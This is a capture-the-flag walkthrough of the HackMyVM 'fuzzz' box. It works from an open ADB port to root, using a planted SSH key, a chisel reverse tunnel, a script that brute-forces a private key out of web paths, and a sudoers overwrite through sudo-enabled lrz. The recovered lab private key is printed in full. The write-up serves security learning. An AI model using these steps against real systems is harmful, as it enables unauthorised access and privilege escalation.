
HMV fuzzz walkthrough

Although this box is rated low/easy, a lot of it I did not anticipate; it has been a long time since I last did a box, so I did this one in "coward mode", following the group owner's video T_T
This is my record of reproducing it after the coward-mode run.

Port scanning

┌──(root㉿kali)-[~]
└─# nmap 192.168.250.67 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 23:12 CST
Nmap scan report for bogon (192.168.250.67)
Host is up (0.00093s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5555/tcp open freeciv
MAC Address: 00:0C:29:B8:32:24 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds

┌──(root㉿kali)-[~]
└─# nmap 192.168.250.67 -sV -p 5555
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 23:13 CST
Nmap scan report for bogon (192.168.250.67)
Host is up (0.0018s latency).

PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge (token auth required)
MAC Address: 00:0C:29:B8:32:24 (VMware)
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.17 seconds

The scan found port 5555, which is not commonly seen; a version scan with -sV identifies it as the adb service.
I asked GPT what adb is:
Android's remote management tool; you can connect as long as USB debugging is enabled on the device.

Privilege escalation

Connect with adb connect, then adb shell gives a shell, but that shell is unstable and drops on its own, so write my public key in and connect over ssh instead.

┌──(root㉿kali)-[~/tmp]
└─# adb connect 192.168.250.67:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.250.67:5555

┌──(root㉿kali)-[~/tmp]
└─# adb shell
/ $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
┌──(root㉿kali)-[~/tmp]
└─# adb shell
/ $ cd
~ $ ls
~ $ ls -al
total 8
drwx------ 2 runner runner 4096 May 19 09:08 .
drwxr-xr-x 4 root root 4096 May 19 10:02 ..
lrwxrwxrwx 1 root runner 9 May 19 09:08 .ash_history -> /dev/null
~ $ cd /home
/home $ ls
asahi runner
/home $ cd runner
~ $ ls -al
total 8
drwx------ 2 runner runner 4096 May 19 09:08 .
drwxr-xr-x 4 root root 4096 May 19 10:02 ..
lrwxrwxrwx 1 root runner 9 May 19 09:08 .ash_history -> /dev/null
~ $ mkdir .ssh
~ $ cd .ssh

~/.ssh $ exit

Write the public key into .ssh/authorized_keys

┌──(root㉿kali)-[~/tmp]
└─# ssh runner@192.168.250.67
The authenticity of host '192.168.250.67 (192.168.250.67)' can't be established.
ED25519 key fingerprint is SHA256:y+2KKHDaMy8FmNZpu0PMG4PJ+b1w5rQQScGZYvJj4L8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.250.67' (ED25519) to the list of known hosts.

fuzzz:~$ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)

Then there is nothing in the runner user's home directory, sudo -l also asks for a password, and uploading pspy64 shows no cron jobs either.
The next step is netstat -lntup to see whether any service is running in the background; there is one, on port 80.

fuzzz:~$ netstat -lntup
netstat: showing only processes with your user ID
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5555 0.0.0.0:* LISTEN 4291/python3
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 :::22 :::* LISTEN -

Next, pull a socat over to forward the port.
For some reason my statically compiled socat would not run in this shell, so I used chisel instead, which works very well.
Download the linux_amd64 build from https://github.com/jpillora/chisel/releases

┌──(root㉿kali)-[~/tmp]
└─# ./chisel server -p 1234 --reverse
2025/09/08 17:36:05 server: Reverse tunnelling enabled
2025/09/08 17:36:05 server: Fingerprint sJnrFzp0p2DlaaIHEP3ZOubOvfaXbjMBw6IMNCMaKOc=
2025/09/08 17:36:05 server: Listening on http://0.0.0.0:1234

fuzzz:~$ chmod +x chisel
fuzzz:~$ ./chisel client 192.168.250.196:1234 R:8888:127.0.0.1:80

The commands mean: on kali, start the server listening on port 1234 with reverse tunnelling enabled.
Then run the client on the target, connecting to kali on port 1234; R stands for remote mode, forwarding the target's port 80 to port 8888 on kali.
Scanning with gobuster finds many line entries; presumably there are also line3, line4 and so on.

┌──(root㉿kali)-[~/tmp]
└─# gobuster dir -u http://127.0.0.1:8888 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,txt,html,jpg,png,xml,zip,js -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:8888
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,jpg,png,xml,zip,js
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/line (Status: 200) [Size: 0]
/line2 (Status: 200) [Size: 0]
/line1 (Status: 200) [Size: 0]
Progress: 47956 / 1868796 (2.57%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 47972 / 1868796 (2.57%)
===============================================================
Finished
===============================================================

Continue scanning under line1

┌──(root㉿kali)-[~/tmp]
└─# gobuster dir -u http://127.0.0.1:8888/line1 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,txt,html,jpg,png,xml,zip,js -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:8888/line1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,jpg,png,xml,zip,js
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/b (Status: 200) [Size: 0]
/b3 (Status: 200) [Size: 0]
Progress: 25930 / 1868796 (1.39%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 25951 / 1868796 (1.39%)
===============================================================
Finished
===============================================================

Here b3 shows up; because I was in coward mode I knew this is the start of id_rsa. I need to be more alert to this in future.
So this box puts the contents of a private key in the directory tree, and each line is one line of the key.
First write a script to see how many lines there are.

import requests

base_url = "http://127.0.0.1:8888"
max_line = 50


def find_lines():
    print(f"[*] 开始检测总行数")

    line = 1
    while line < max_line:
        url = f"{base_url}/line{line}"
        response = requests.head(url, timeout=5, allow_redirects=True)

        if response.status_code == 200:
            print(f"[+]发现新行数 line{line}")
            line += 1
        elif response.status_code == 404:
            total_line = line - 1
            print(f"共发现行数{total_line}")
            return total_line
        else:
            print(f"意外状态码: {response.status_code}")
            return -1
    # reached max_line without seeing a 404: report the cap so the caller knows to raise it
    return max_line - 1


if __name__ == "__main__":
    find_lines()

After running it we know there are 5 lines in total.
Then write another script to fetch the content of each line.

import requests
import string

charset = string.ascii_letters + string.digits + "+/=-"
base_url = "http://127.0.0.1:8888/"


def brute_rsa():
    id_rsa = []  # stores every recovered line

    for line_num in range(1, 6):
        print(f"[*]正在爆破第{line_num}行")

        current = ""
        while True:  # when no character matches, this line is complete
            found = False
            for char in charset:
                path = current + char
                url = f"{base_url}line{line_num}/{path}"
                response = requests.head(url, timeout=5, allow_redirects=True)

                if response.status_code == 200:
                    current += char
                    print(f"[+]current_line:{current}")
                    found = True
                    break  # one character found, restart the inner loop
            if not found:
                print()
                break  # the whole charset was tried, so this line is finished
        id_rsa.append(current)
    print("[*]爆破完成")
    print("\n".join(id_rsa))


if __name__ == "__main__":
    brute_rsa()
[*]爆破完成
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=

Then add the private key header and footer to get id_rsa

┌──(root㉿kali)-[~/tmp]
└─# cat id_rsa1
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u
XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw
AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J
5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=
-----END OPENSSH PRIVATE KEY-----
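As an added example (not part of the original writeup), this script makes two points from above concrete: why a path fragment like "b3" or "b3B" is recognisable as the start of an OpenSSH key, and how to parse the openssh-key-v1 container of the recovered lines to check that nothing was corrupted or truncated during the line-by-line recovery (matching check ints, correct padding) before the key is ever handed to ssh. The input is the five base64 lines recovered above; nothing else is assumed.

```python
import base64
import struct

# The five base64 lines recovered from /line1 .. /line5 above (the box's own key).
RECOVERED_LINES = [
    "b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW",
    "QyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgwAAAJDS3+5f0t/u",
    "XwAAAAtzc2gtZWQyNTUxOQAAACArnEFFrjDI6rYt5GmUDxMvSeX3pcn0GGBfgo1EQtXpgw",
    "AAAEBCjeRitoZJIm1c4i0VD2Muw5nqgb7zC13vMaxS/la+vSucQUWuMMjqti3kaZQPEy9J",
    "5felyfQYYF+CjURC1emDAAAACWFzYWhpQHBoaQECAwQ=",
]
MAGIC = b"openssh-key-v1\x00"
# 15 bytes is a multiple of 3, so the base64 of the magic is fixed: "b3BlbnNzaC1rZXktdjEA".
MAGIC_B64 = base64.b64encode(MAGIC).decode()

def looks_like_openssh_key(fragment: str) -> bool:
    """True if a recovered path fragment such as 'b3' or 'b3B' is a prefix of the magic."""
    return bool(fragment) and MAGIC_B64.startswith(fragment)

def _read_string(buf: bytes, pos: int):  # SSH wire 'string': big-endian uint32 length, then bytes
    (n,) = struct.unpack_from(">I", buf, pos)
    return buf[pos + 4:pos + 4 + n], pos + 4 + n

def parse_openssh_key(lines) -> dict:
    """Parse the openssh-key-v1 container; validate the private section when unencrypted."""
    blob = base64.b64decode("".join(lines))
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    pos = len(MAGIC)
    cipher, pos = _read_string(blob, pos)
    kdf, pos = _read_string(blob, pos)
    _kdfopts, pos = _read_string(blob, pos)
    (nkeys,) = struct.unpack_from(">I", blob, pos)
    pub_blob, pos = _read_string(blob, pos + 4)
    key_type, _ = _read_string(pub_blob, 0)  # first field of the public key blob
    priv, pos = _read_string(blob, pos)
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(), "nkeys": nkeys,
            "key_type": key_type.decode(), "comment": None}
    if cipher == b"none":  # plaintext: two equal check ints, then the key, comment, padding
        c1, c2 = struct.unpack_from(">II", priv, 0)
        if c1 != c2:
            raise ValueError("check ints differ: recovered text is corrupted or truncated")
        p = 8
        for _ in range(3):  # key type, public key, private key material (not returned)
            _, p = _read_string(priv, p)
        comment, p = _read_string(priv, p)
        if priv[p:] != bytes(range(1, len(priv) - p + 1)):  # pad bytes must be 1, 2, 3, ...
            raise ValueError("bad padding")
        info["comment"] = comment.decode()
    return info
```

For this key the parser reports an unencrypted ssh-ed25519 key with the comment asahi@phi, which already tells you which account the key belongs to before trying it.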

Then log in successfully as the asahi user

┌──(root㉿kali)-[~/tmp]
└─# chmod 600 id_rsa1

┌──(root㉿kali)-[~/tmp]
└─# ssh asahi@192.168.250.67 -i id_rsa1

fuzzz:~$ id
uid=1001(asahi) gid=1001(asahi) groups=1001(asahi)
fuzzz:~$

Running sudo -l shows that lrz can be run with sudo

fuzzz:~$ sudo -l
Matching Defaults entries for asahi on fuzzz:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
(ALL) NOPASSWD: /usr/local/bin/lrz
fuzzz:~$ /usr/local/bin/lrz -h
lrz version 0.12.21rc
Usage: lrz [options] [filename.if.xmodem]
Receive files with ZMODEM/YMODEM/XMODEM protocol
(X) = option applies to XMODEM only
(Y) = option applies to YMODEM only
(Z) = option applies to ZMODEM only
-+, --append append to existing files
-a, --ascii ASCII transfer (change CR/LF to LF)
-b, --binary binary transfer
-B, --bufsize N buffer N bytes (N==auto: buffer whole file)
-c, --with-crc Use 16 bit CRC (X)
-C, --allow-remote-commands allow execution of remote commands (Z)
-D, --null write all received data to /dev/null
--delay-startup N sleep N seconds before doing anything
-e, --escape Escape control characters (Z)
-E, --rename rename any files already existing
--errors N generate CRC error every N bytes (debugging)
-h, --help Help, print this usage message
-m, --min-bps N stop transmission if BPS below N
-M, --min-bps-time N for at least N seconds (default: 120)
-O, --disable-timeouts disable timeout code, wait forever for data
--o-sync open output file(s) in synchronous write mode
-p, --protect protect existing files
-q, --quiet quiet, no progress reports
-r, --resume try to resume interrupted file transfer (Z)
-R, --restricted restricted, more secure mode
-s, --stop-at {HH:MM|+N} stop transmission at HH:MM or in N seconds
-S, --timesync request remote time (twice: set local time)
--syslog[=off] turn syslog on or off, if possible
-t, --timeout N set timeout to N tenths of a second
--tcp-server open socket, wait for connection (Z)
--tcp-client ADDR:PORT open socket, connect to ... (Z)
-u, --keep-uppercase keep upper case filenames
-U, --unrestrict disable restricted mode (if allowed to)
-v, --verbose be verbose, provide debugging information
-w, --windowsize N Window is N bytes (Z)
-X --xmodem use XMODEM protocol
-y, --overwrite Yes, clobber existing file if any
--ymodem use YMODEM protocol
-Z, --zmodem use ZMODEM protocol

short options use the same arguments as the long ones

lrz is a command for uploading (receiving) files; looking at the options, -y is the force-overwrite option.
So write a sudoers file and start the receiver in the /etc directory.

fuzzz:/etc$ sudo /usr/local/bin/lrz -y
fuzzz:/etc$ sudo -l
Matching Defaults entries for asahi on fuzzz:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asahi:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User asahi may run the following commands on fuzzz:
(ALL) NOPASSWD: /usr/local/bin/lrz
(ALL : ALL) NOPASSWD: ALL

I used FinalShell here; after entering the command it prompts you to choose a file, and once it is uploaded the current user has full privileges.

fuzzz:/etc$ sudo su -
fuzzz:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Summary

  • Learned that adb is a debugging tool and that adb shell gives a shell
  • Besides socat, learned the chisel tool and the port-forwarding usage here: reverse connection
  • Know to be more alert to private-key content: b3B here is the start of id_rsa
  • Improve scripting skills
  • Finally used lrz's file overwrite to escalate privileges via a sudoers file